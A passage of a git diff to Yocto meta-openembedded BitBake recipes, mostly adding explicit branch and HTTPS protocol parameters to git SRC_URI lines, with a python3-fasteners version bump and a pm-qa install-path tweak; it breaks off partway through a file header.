625756873b..b9ed1bcd7b 100644 --- a/meta-openembedded/meta-oe/recipes-support/spitools/spitools_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/spitools/spitools_git.bb @@ -10,7 +10,7 @@ SRCREV = "4a36a84f7df291ddaebd397aecf0c8515256a8e0" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/cpb-/spi-tools.git;protocol=git" +SRC_URI = "git://github.com/cpb-/spi-tools.git;protocol=https;branch=master" inherit autotools diff --git a/meta-openembedded/meta-oe/recipes-support/thin-provisioning-tools/thin-provisioning-tools_0.8.5.bb b/meta-openembedded/meta-oe/recipes-support/thin-provisioning-tools/thin-provisioning-tools_0.8.5.bb index 3f82734acd..5bcbea4600 100644 --- a/meta-openembedded/meta-oe/recipes-support/thin-provisioning-tools/thin-provisioning-tools_0.8.5.bb +++ b/meta-openembedded/meta-oe/recipes-support/thin-provisioning-tools/thin-provisioning-tools_0.8.5.bb @@ -7,7 +7,7 @@ SECTION = "devel" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/jthornber/thin-provisioning-tools;branch=main \ +SRC_URI = "git://github.com/jthornber/thin-provisioning-tools;branch=main;protocol=https \ file://0001-do-not-strip-pdata_tools-at-do_install.patch \ file://use-sh-on-path.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/toscoterm/toscoterm_git.bb b/meta-openembedded/meta-oe/recipes-support/toscoterm/toscoterm_git.bb index aba485e1a4..4dddd54c5f 100644 --- a/meta-openembedded/meta-oe/recipes-support/toscoterm/toscoterm_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/toscoterm/toscoterm_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://main.c;start_line=5;end_line=16;md5=9ae4bf20caf291afa # 0.2 version SRCREV = "8586d617aed19fc75f5ae1e07270752c1b2f9a30" -SRC_URI = "git://github.com/OSSystems/toscoterm.git" +SRC_URI = "git://github.com/OSSystems/toscoterm.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/udisks/udisks2_git.bb b/meta-openembedded/meta-oe/recipes-support/udisks/udisks2_git.bb index ecaf01e71d..c4d0fa75ee 100644 --- a/meta-openembedded/meta-oe/recipes-support/udisks/udisks2_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/udisks/udisks2_git.bb @@ -17,7 +17,7 @@ DEPENDS += "${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" RDEPENDS_${PN} = "acl" SRC_URI = " \ - git://github.com/storaged-project/udisks.git;branch=master \ + git://github.com/storaged-project/udisks.git;branch=master;protocol=https \ " PV = "2.8.4+git${SRCREV}" SRCREV = "db5f487345da2eaa87976450ea51c2c465d9b82e" diff --git a/meta-openembedded/meta-oe/recipes-support/uhubctl/uhubctl_2.1.0.bb b/meta-openembedded/meta-oe/recipes-support/uhubctl/uhubctl_2.1.0.bb index b294d77bad..0bb48412a9 100644 --- a/meta-openembedded/meta-oe/recipes-support/uhubctl/uhubctl_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/uhubctl/uhubctl_2.1.0.bb @@ -7,7 +7,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRCREV = "c9fa3c68a1b2c9790c731602b8bae2b513e80605" -SRC_URI = "git://github.com/mvp/${BPN}" +SRC_URI = "git://github.com/mvp/${BPN};branch=master;protocol=https" S = "${WORKDIR}/git" # uhubctl gets its program version from "git describe". As we use the source diff --git a/meta-openembedded/meta-oe/recipes-support/uthash/uthash_2.1.0.bb b/meta-openembedded/meta-oe/recipes-support/uthash/uthash_2.1.0.bb index 09cef44a85..3f4529e1a0 100644 --- a/meta-openembedded/meta-oe/recipes-support/uthash/uthash_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/uthash/uthash_2.1.0.bb @@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a2513f7d2291df840527b76b2a8f9718" SRCREV = "8b214aefcb81df86a7e5e0d4fa20e59a6c18bc02" SRC_URI = "\ - git://github.com/troydhanson/${BPN}.git \ + git://github.com/troydhanson/${BPN}.git;branch=master;protocol=https \ file://run-ptest \ " diff --git a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-evemu_git.bb b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-evemu_git.bb index 7c5a734394..e1ec1fda8b 100644 --- a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-evemu_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-evemu_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" inherit autotools -SRC_URI = "git://bitmath.org/git/evemu.git;protocol=http \ +SRC_URI = "git://bitmath.org/git/evemu.git;protocol=http;branch=master \ file://0001-Fix-build-on-32bit-arches-with-64bit-time_t.patch \ " SRCREV = "9752b50e922572e4cd214ac45ed95e4ee410fe24" diff --git a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-frame_git.bb b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-frame_git.bb index 1ebebfa9f5..5993956353 100644 --- a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-frame_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-frame_git.bb @@ -9,7 +9,7 @@ DEPENDS += "mtdev utouch-evemu" inherit autotools pkgconfig -SRC_URI = "git://bitmath.org/git/frame.git;protocol=http \ +SRC_URI = "git://bitmath.org/git/frame.git;protocol=http;branch=master \ file://remove-man-page-creation.patch \ file://0001-include-sys-stat.h-for-fixing-build-issue-on-musl.patch \ file://0001-Fix-build-on-32bit-arches-with-64bit-time_t.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-mtview_git.bb b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-mtview_git.bb index 5f07bf28ee..65edaf1e5b 100644 --- a/meta-openembedded/meta-oe/recipes-support/utouch/utouch-mtview_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/utouch/utouch-mtview_git.bb @@ -9,7 +9,7 @@ inherit autotools pkgconfig features_check # depends on virtual/libx11 REQUIRED_DISTRO_FEATURES = "x11" -SRC_URI = "git://bitmath.org/git/mtview.git;protocol=http" +SRC_URI = "git://bitmath.org/git/mtview.git;protocol=http;branch=master" SRCREV = "ad437c38dc111cf3990a03abf14efe1b5d89604b" DEPENDS += "mtdev utouch-frame utouch-evemu libx11" diff --git a/meta-openembedded/meta-oe/recipes-support/websocketpp/websocketpp_0.8.2.bb b/meta-openembedded/meta-oe/recipes-support/websocketpp/websocketpp_0.8.2.bb index 79a5ac5c4e..673fc5899b 100644 --- a/meta-openembedded/meta-oe/recipes-support/websocketpp/websocketpp_0.8.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/websocketpp/websocketpp_0.8.2.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://${S}/COPYING;md5=4d168d763c111f4ffc62249870e4e0ea" DEPENDS = " ${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'openssl boost zlib', '', d)} " -SRC_URI = "git://github.com/zaphoyd/websocketpp.git;protocol=https \ +SRC_URI = "git://github.com/zaphoyd/websocketpp.git;protocol=https;branch=master \ file://0001-cmake-Use-GNUInstallDirs.patch \ file://855.patch \ file://857.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/xdelta/xdelta3_3.1.0.bb b/meta-openembedded/meta-oe/recipes-support/xdelta/xdelta3_3.1.0.bb index d100030f9b..c161781989 100644 --- a/meta-openembedded/meta-oe/recipes-support/xdelta/xdelta3_3.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/xdelta/xdelta3_3.1.0.bb @@ -7,7 +7,7 @@ SECTION = "console/utils" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833" -SRC_URI = "git://github.com/jmacd/xdelta.git;branch=release3_1_apl" +SRC_URI = "git://github.com/jmacd/xdelta.git;branch=release3_1_apl;protocol=https" SRCREV = "4b4aed71a959fe11852e45242bb6524be85d3709" S = "${WORKDIR}/git/xdelta3" diff --git a/meta-openembedded/meta-oe/recipes-support/xorg-xrdp/xorgxrdp_0.2.5.bb b/meta-openembedded/meta-oe/recipes-support/xorg-xrdp/xorgxrdp_0.2.5.bb index 481e7303b3..1ba4a32ba6 100644 --- a/meta-openembedded/meta-oe/recipes-support/xorg-xrdp/xorgxrdp_0.2.5.bb +++ b/meta-openembedded/meta-oe/recipes-support/xorg-xrdp/xorgxrdp_0.2.5.bb @@ -10,7 +10,7 @@ DEPENDS = "virtual/libx11 xserver-xorg xrdp nasm-native" inherit features_check REQUIRED_DISTRO_FEATURES = "x11 pam" -SRC_URI = "git://github.com/neutrinolabs/xorgxrdp.git" +SRC_URI = "git://github.com/neutrinolabs/xorgxrdp.git;branch=master;protocol=https" SRCREV = "c122544f184d4031bbae1ad80fbab554c34a9427" diff --git a/meta-openembedded/meta-oe/recipes-support/xrdp/xrdp_0.9.11.bb b/meta-openembedded/meta-oe/recipes-support/xrdp/xrdp_0.9.11.bb index deda0fd1b5..36184705bc 100644 --- a/meta-openembedded/meta-oe/recipes-support/xrdp/xrdp_0.9.11.bb +++ b/meta-openembedded/meta-oe/recipes-support/xrdp/xrdp_0.9.11.bb @@ -10,7 +10,7 @@ DEPENDS = "openssl virtual/libx11 libxfixes libxrandr libpam nasm-native" REQUIRED_DISTRO_FEATURES = "x11 pam" -SRC_URI = "git://github.com/neutrinolabs/xrdp.git \ +SRC_URI = "git://github.com/neutrinolabs/xrdp.git;branch=master;protocol=https \ file://xrdp.sysconfig \ file://0001-Added-req_distinguished_name-in-etc-xrdp-openssl.con.patch \ file://0001-Fix-the-compile-error.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/xxhash/xxhash_0.7.3.bb b/meta-openembedded/meta-oe/recipes-support/xxhash/xxhash_0.7.3.bb index 865adc5a1b..783af89bed 100644 --- a/meta-openembedded/meta-oe/recipes-support/xxhash/xxhash_0.7.3.bb +++ b/meta-openembedded/meta-oe/recipes-support/xxhash/xxhash_0.7.3.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://www.xxhash.com/" LICENSE = "BSD-2-Clause & GPL-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=01a7eba4212ef1e882777a38585e7a9b" -SRC_URI = "git://github.com/Cyan4973/xxHash.git" +SRC_URI = "git://github.com/Cyan4973/xxHash.git;branch=master;protocol=https" UPSTREAM_CHECK_GITTAGREGEX = "v(?P\d+(\.\d+)+)" SRCREV = "d408e9b0606d07b1ddc5452ffc0ec8512211b174" diff --git a/meta-openembedded/meta-oe/recipes-support/zbar/zbar_git.bb b/meta-openembedded/meta-oe/recipes-support/zbar/zbar_git.bb index 935e09cd53..46ca549c5c 100644 --- a/meta-openembedded/meta-oe/recipes-support/zbar/zbar_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/zbar/zbar_git.bb @@ -10,7 +10,7 @@ PV = "0.10+git${SRCPV}" # iPhoneSDK-1.3.1 tag SRCREV = "67003d2a985b5f9627bee2d8e3e0b26d0c474b57" -SRC_URI = "git://github.com/ZBar/Zbar \ +SRC_URI = "git://github.com/ZBar/Zbar;branch=master;protocol=https \ file://0001-make-relies-GNU-extentions.patch \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/zchunk/zchunk_1.1.6.bb b/meta-openembedded/meta-oe/recipes-support/zchunk/zchunk_1.1.6.bb index e041132b1c..e4c0232bd9 100644 --- a/meta-openembedded/meta-oe/recipes-support/zchunk/zchunk_1.1.6.bb +++ b/meta-openembedded/meta-oe/recipes-support/zchunk/zchunk_1.1.6.bb @@ -4,7 +4,7 @@ AUTHOR = "Jonathan Dieter" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=cd6e590282010ce90a94ef25dd31410f" -SRC_URI = "git://github.com/zchunk/zchunk.git;protocol=https" +SRC_URI = "git://github.com/zchunk/zchunk.git;protocol=https;branch=master" SRCREV = "f5593aa11584faa691c81b4898f0aaded47f8bf7" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-test/bats/bats_1.1.0.bb b/meta-openembedded/meta-oe/recipes-test/bats/bats_1.1.0.bb index a8179744ae..7ee0205766 100644 --- a/meta-openembedded/meta-oe/recipes-test/bats/bats_1.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-test/bats/bats_1.1.0.bb @@ -6,7 +6,7 @@ HOMEPAGE = "https://github.com/bats-core/bats-core" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=2970203aedf9e829edb96a137a4fe81b" -SRC_URI = "git://github.com/bats-core/bats-core.git \ +SRC_URI = "git://github.com/bats-core/bats-core.git;branch=master;protocol=https \ " # v1.1.0 SRCREV = "c706d1470dd1376687776bbe985ac22d09780327" diff --git a/meta-openembedded/meta-oe/recipes-test/catch2/catch2_2.9.2.bb b/meta-openembedded/meta-oe/recipes-test/catch2/catch2_2.9.2.bb index 57fc935f77..9d449a23a6 100644 --- a/meta-openembedded/meta-oe/recipes-test/catch2/catch2_2.9.2.bb +++ b/meta-openembedded/meta-oe/recipes-test/catch2/catch2_2.9.2.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/catchorg/Catch2" LICENSE = "BSL-1.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=e4224ccaecb14d942c71d31bef20d78c" -SRC_URI = "git://github.com/catchorg/Catch2.git" +SRC_URI = "git://github.com/catchorg/Catch2.git;branch=master;protocol=https" SRCREV = "2c869e17e4803d30b3d5ca5b0d76387b9db97fa5" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-test/evtest/evtest_1.34.bb b/meta-openembedded/meta-oe/recipes-test/evtest/evtest_1.34.bb index a3a23c8951..eb6a34f301 100644 --- a/meta-openembedded/meta-oe/recipes-test/evtest/evtest_1.34.bb +++ b/meta-openembedded/meta-oe/recipes-test/evtest/evtest_1.34.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" DEPENDS = "libxml2" SRCREV = "16e5104127a620686bdddc4a9ad62881134d6c69" -SRC_URI = "git://gitlab.freedesktop.org/libevdev/evtest.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/libevdev/evtest.git;protocol=https;branch=master \ file://add_missing_limits_h_include.patch \ file://0001-Fix-build-on-32bit-arches-with-64bit-time_t.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-test/fbtest/fb-test_git.bb b/meta-openembedded/meta-oe/recipes-test/fbtest/fb-test_git.bb index 6a9d4b2787..2992135726 100644 --- a/meta-openembedded/meta-oe/recipes-test/fbtest/fb-test_git.bb +++ b/meta-openembedded/meta-oe/recipes-test/fbtest/fb-test_git.bb @@ -6,7 +6,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a" SRCREV = "063ec650960c2d79ac51f5c5f026cb05343a33e2" -SRC_URI = "git://github.com/prpplague/fb-test-app.git" +SRC_URI = "git://github.com/prpplague/fb-test-app.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-test/googletest/googletest_git.bb b/meta-openembedded/meta-oe/recipes-test/googletest/googletest_git.bb index 354e7de337..898f23fafb 100644 --- a/meta-openembedded/meta-oe/recipes-test/googletest/googletest_git.bb +++ b/meta-openembedded/meta-oe/recipes-test/googletest/googletest_git.bb @@ -11,7 +11,7 @@ PROVIDES += "gmock gtest" S = "${WORKDIR}/git" SRCREV = "703bd9caab50b139428cea1aaff9974ebee5742e" -SRC_URI = "git://github.com/google/googletest.git" +SRC_URI = "git://github.com/google/googletest.git;branch=master;protocol=https" inherit cmake diff --git a/meta-openembedded/meta-oe/recipes-test/pm-qa/pm-qa_git.bb b/meta-openembedded/meta-oe/recipes-test/pm-qa/pm-qa_git.bb index 7e9971ea4c..bb641437c9 100644 --- a/meta-openembedded/meta-oe/recipes-test/pm-qa/pm-qa_git.bb +++ b/meta-openembedded/meta-oe/recipes-test/pm-qa/pm-qa_git.bb @@ -42,6 +42,7 @@ do_install () { do # Remove hardcoded relative paths sed -i -e 's#..\/utils\/##' ${script} + sed -i -e 's#. ..\/Switches#${bindir}#g' ${script} script_basename=`basename ${script}` install -m 0755 $script ${D}${libdir}/${BPN}/${script_basename} @@ -54,7 +55,7 @@ do_install () { # if the script includes any helper scripts from the $libdir # directory then change the source path to the absolute path # to reflect the install location of the helper scripts. - sed -i -e "s#source ../include#source ${libdir}/${BPN}#g" ${script} + sed -i -e "s#. ../include#. ${libdir}/${BPN}#g" ${script} # Remove hardcoded relative paths sed -i -e 's#..\/utils\/##' ${script} diff --git a/meta-openembedded/meta-perl/recipes-perl/po4a/po4a_0.49.bb b/meta-openembedded/meta-perl/recipes-perl/po4a/po4a_0.49.bb index 5db5b8f8bc..d6c1d14f21 100644 --- a/meta-openembedded/meta-perl/recipes-perl/po4a/po4a_0.49.bb +++ b/meta-openembedded/meta-perl/recipes-perl/po4a/po4a_0.49.bb @@ -6,7 +6,7 @@ HOMEPAGE = "https://po4a.alioth.debian.org" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=a96fc9b4cc36d80659e694ea109f0325" -SRC_URI = "git://alioth.debian.org/anonscm/git/po4a/po4a.git;protocol=https" +SRC_URI = "git://alioth.debian.org/anonscm/git/po4a/po4a.git;protocol=https;branch=master" # v0.49 SRCREV = "79ed87a577a543538fe39c7b60079981f5997072" diff --git a/meta-openembedded/meta-python/recipes-connectivity/python-txws/python3-txws_0.9.1.bb b/meta-openembedded/meta-python/recipes-connectivity/python-txws/python3-txws_0.9.1.bb index e235682cf4..7910fcd18a 100644 --- a/meta-openembedded/meta-python/recipes-connectivity/python-txws/python3-txws_0.9.1.bb +++ b/meta-openembedded/meta-python/recipes-connectivity/python-txws/python3-txws_0.9.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=76699830db7fa9e897f6a1ad05f98ec8" DEPENDS = "python3-twisted python3-six python3-vcversioner python3-six-native python3-vcversioner-native" -SRC_URI = "git://github.com/MostAwesomeDude/txWS.git" +SRC_URI = "git://github.com/MostAwesomeDude/txWS.git;branch=master;protocol=https" SRCREV= "88cf6d9b9b685ffa1720644bd53c742afb10a414" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/gyp/gyp.inc b/meta-openembedded/meta-python/recipes-devtools/gyp/gyp.inc index 98ed42cc90..1415b41623 100644 --- a/meta-openembedded/meta-python/recipes-devtools/gyp/gyp.inc +++ b/meta-openembedded/meta-python/recipes-devtools/gyp/gyp.inc @@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=ab828cb8ce4c62ee82945a11247b6bbd" SECTION = "devel" -SRC_URI = "git://chromium.googlesource.com/external/gyp;protocol=https" +SRC_URI = "git://chromium.googlesource.com/external/gyp;protocol=https;branch=master" SRCREV = "fcd686f1880fa52a1ee78d3e98af1b88cb334528" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python-feedformatter.inc b/meta-openembedded/meta-python/recipes-devtools/python/python-feedformatter.inc index 6ddcaa98ec..d1669977a9 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python-feedformatter.inc +++ b/meta-openembedded/meta-python/recipes-devtools/python/python-feedformatter.inc @@ -5,7 +5,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=258e3f39e2383fbd011035d04311008d" SRCREV = "7391193c83e10420b5a2d8ef846d23fc368c6d85" -SRC_URI = "git://github.com/marianoguerra/feedformatter.git" +SRC_URI = "git://github.com/marianoguerra/feedformatter.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-absl_0.7.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-absl_0.7.0.bb index c65a6d7da4..9811c3b9c9 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-absl_0.7.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-absl_0.7.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/abseil/abseil-py.git" +SRC_URI = "git://github.com/abseil/abseil-py.git;branch=master;protocol=https" SRCREV ?= "e3ce504183c57fc4eca52fe84732c11cda99d131" inherit setuptools3 diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-astor_0.8.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-astor_0.8.1.bb index 125a0236ec..5b3c73c923 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-astor_0.8.1.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-astor_0.8.1.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=561205fdabc3ec52cae2d30815b8ade7" -SRC_URI = "git://github.com/berkerpeksag/astor.git " +SRC_URI = "git://github.com/berkerpeksag/astor.git;branch=master;protocol=https" SRCREV ?= "c7553c79f9222e20783fe9bd8a553f932e918072" inherit setuptools3 diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-dbussy_1.2.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-dbussy_1.2.1.bb index ac4b8c2aa6..c33c0f110f 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-dbussy_1.2.1.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-dbussy_1.2.1.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/ldo/dbussy" LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7" -SRC_URI = "git://github.com/ldo/dbussy.git" +SRC_URI = "git://github.com/ldo/dbussy.git;branch=master;protocol=https" SRCREV = "d0ec0223f3797e1612d835e71694a1083881149f" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-dt-schema_git.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-dt-schema_git.bb index 06a9012ca4..d14b7de62a 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-dt-schema_git.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-dt-schema_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://setup.py;beginline=2;endline=3;md5=c795d4924c5f739424 inherit setuptools3 -SRC_URI = "git://github.com/robherring/dt-schema.git" +SRC_URI = "git://github.com/robherring/dt-schema.git;branch=master;protocol=https" SRCREV = "5009e47c1c76e48871f5988e08dad61f3c91196b" PV = "0.1+git${SRCPV}" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.15.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.15.bb deleted file mode 100644 index 8786a14842..0000000000 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.15.bb +++ /dev/null @@ -1,9 +0,0 @@ -SUMMARY = "A python package that provides useful locks." -HOMEPAGE = "https://github.com/harlowja/fasteners" -LICENSE = "Apache-2.0" -LIC_FILES_CHKSUM = "file://LICENSE;md5=4476c4be31402271e101d9a4a3430d52" - -SRC_URI[md5sum] = "440f8ab461c8fed941355860d8669556" -SRC_URI[sha256sum] = "3a176da6b70df9bb88498e1a18a9e4a8579ed5b9141207762368a1017bf8f5ef" - -inherit pypi setuptools3 diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.16.3.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.16.3.bb new file mode 100644 index 0000000000..1ba2c6f200 --- /dev/null +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.16.3.bb @@ -0,0 +1,14 @@ +SUMMARY = "A python package that provides useful locks." +HOMEPAGE = "https://github.com/harlowja/fasteners" +LICENSE = "Apache-2.0" +LIC_FILES_CHKSUM = "file://LICENSE;md5=4476c4be31402271e101d9a4a3430d52" + +SRC_URI[md5sum] = "243188fe770ad60e9da722bef9dc7a78" +SRC_URI[sha256sum] = "b1ab4e5adfbc28681ce44b3024421c4f567e705cc3963c732bf1cba3348307de" + +inherit pypi setuptools3 + +RDEPENDS:${PN} += "\ + ${PYTHON_PN}-logging \ + ${PYTHON_PN}-fcntl \ +" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-gast_0.2.2.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-gast_0.2.2.bb index 6e08a19949..caf80c7621 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-gast_0.2.2.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-gast_0.2.2.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=a3ad9b6802e713fc5e307e1230f1ea90" -SRC_URI = "git://github.com/serge-sans-paille/gast.git" +SRC_URI = "git://github.com/serge-sans-paille/gast.git;branch=master;protocol=https" SRCREV ?= "ed82e2a507505c6b18eb665d3738b6c0602da5e7" inherit setuptools3 diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-h5py_2.9.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-h5py_2.9.0.bb index 7822e463ee..711ced022e 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-h5py_2.9.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-h5py_2.9.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://setup.py;beginline=107;endline=107;md5=795ecad0d261c998cc526c84a822dff6" -SRC_URI = "git://github.com/h5py/h5py.git \ +SRC_URI = "git://github.com/h5py/h5py.git;branch=master;protocol=https \ file://0001-cross-compiling-support.patch \ " SRCREV ?= "8d96a14c3508de1bde77aec5db302e478dc5dbc4" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-imageio_2.6.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-imageio_2.6.0.bb index 8fe4b988db..4d8af17209 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-imageio_2.6.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-imageio_2.6.0.bb @@ -5,7 +5,7 @@ SECTION = "devel/python" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=d8b7fdd0dff0fd18f35c05365d3d7bf7" -SRC_URI = "git://github.com/imageio/imageio.git;protocol=https" +SRC_URI = "git://github.com/imageio/imageio.git;protocol=https;branch=master" SRCREV = "0b161649b3ee108f80bd99466aeab2e65cf82cd8" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-applications_1.0.8.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-applications_1.0.8.bb index 4293a63c1e..a124dd9f5b 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-applications_1.0.8.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-applications_1.0.8.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=366e2fd3c9714f162d3663b6f97cfe41" -SRC_URI = "git://github.com/keras-team/keras-applications.git" +SRC_URI = "git://github.com/keras-team/keras-applications.git;branch=master;protocol=https" SRCREV ?= "3b180cb10eda683dda7913ecee2e6487288d292d" diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-preprocessing_1.1.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-preprocessing_1.1.0.bb index eacb3402d6..feb872e0a7 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-preprocessing_1.1.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-keras-preprocessing_1.1.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=1744b320500cc2e3112964d00cce7aa4" -SRC_URI = "git://github.com/keras-team/keras-preprocessing.git" +SRC_URI = "git://github.com/keras-team/keras-preprocessing.git;branch=master;protocol=https" SRCREV ?= "ff90696c0416b74344b91df097b228e694339b88" inherit setuptools3 diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-langtable_0.0.38.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-langtable_0.0.38.bb index eb42fe978c..fd39e0fdb7 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-langtable_0.0.38.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-langtable_0.0.38.bb @@ -11,7 +11,7 @@ B = "${S}" SRCREV = "35687ca957b746f153a6872139462b1443f8cad1" PV = "0.0.38+git${SRCPV}" -SRC_URI = "git://github.com/mike-fabian/langtable.git;branch=master \ +SRC_URI = "git://github.com/mike-fabian/langtable.git;branch=master;protocol=https \ " inherit setuptools3 python3native diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-pillow_6.2.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-pillow_6.2.1.bb index a383a3ff91..80b7e941ae 100644 --- 